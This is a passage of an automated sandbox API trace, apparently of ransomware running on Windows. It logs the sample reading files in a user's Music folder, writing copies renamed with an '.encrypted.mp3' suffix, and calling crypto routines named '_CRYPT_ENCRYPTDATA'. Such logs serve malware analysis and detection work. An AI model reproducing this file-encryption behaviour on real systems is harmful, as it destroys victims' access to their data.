hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.628] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0038.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0038.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.629] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.629] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.629] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0038.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0038.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.631] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xajmo5bmfrmn.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.632] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0038.632] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0038.632] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0038.633] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.633] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.633] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0038.635] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x3874, lpOverlapped=0x0) returned 1 [0038.636] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13874) returned 0xac0018 [0038.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0038.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13874) returned 0x935008 [0038.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.642] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13874) returned 0xac0018 [0038.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.644] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13874) returned 0xac0018 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0038.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13874) returned 0x948888 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0038.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.648] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da218 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889988 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.648] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 